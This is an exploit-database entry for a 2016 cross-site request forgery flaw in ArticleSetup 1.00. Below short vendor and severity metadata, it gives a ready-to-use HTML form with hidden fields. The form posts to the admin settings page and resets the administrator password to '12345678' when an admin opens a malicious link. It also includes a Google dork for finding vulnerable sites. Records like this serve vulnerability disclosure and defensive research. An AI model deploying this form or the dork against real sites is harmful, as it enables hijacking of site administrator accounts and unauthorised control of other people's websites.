ArticleSetup 1.00 - CSRF Change Admin Password

vendor:

ArticleSetup

by:

Ali Ghanbari

7,5

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: ArticleSetup

Affected Version From: 1.00

Affected Version To: 1.00

Patch Exists: NO

Related CWE: N/A

CPE: ArticleSetup

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2016

ArticleSetup 1.00 – CSRF Change Admin Password

When an admin clicks on a malicious link, an attacker can login as a new Administrator with the credentials detailed below.

Mitigation:

Implementing CSRF protection tokens, validating input, and using secure authentication methods.

Source

Exploit-DB raw data:

<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork   : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00

#Desc:

When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.

#Exploit:
-->

<html>
 <body>
  <form method="post"  action="
http://localhost/{PACH}/admin/adminsettings.php">
      <input type="hidden" name="update" value="1">
      <input type="hidden" name="pass1" type="hidden" value="12345678" >
      <input type="hidden" name="pass2" type="hidden" value="12345678" >
      <input type="submit" value="create">
  </form>
 </body>
</html>

<!--
####################################

[+]Exploit by: Ali Ghanbari

[+]My Telegram :@Exploiter007
-->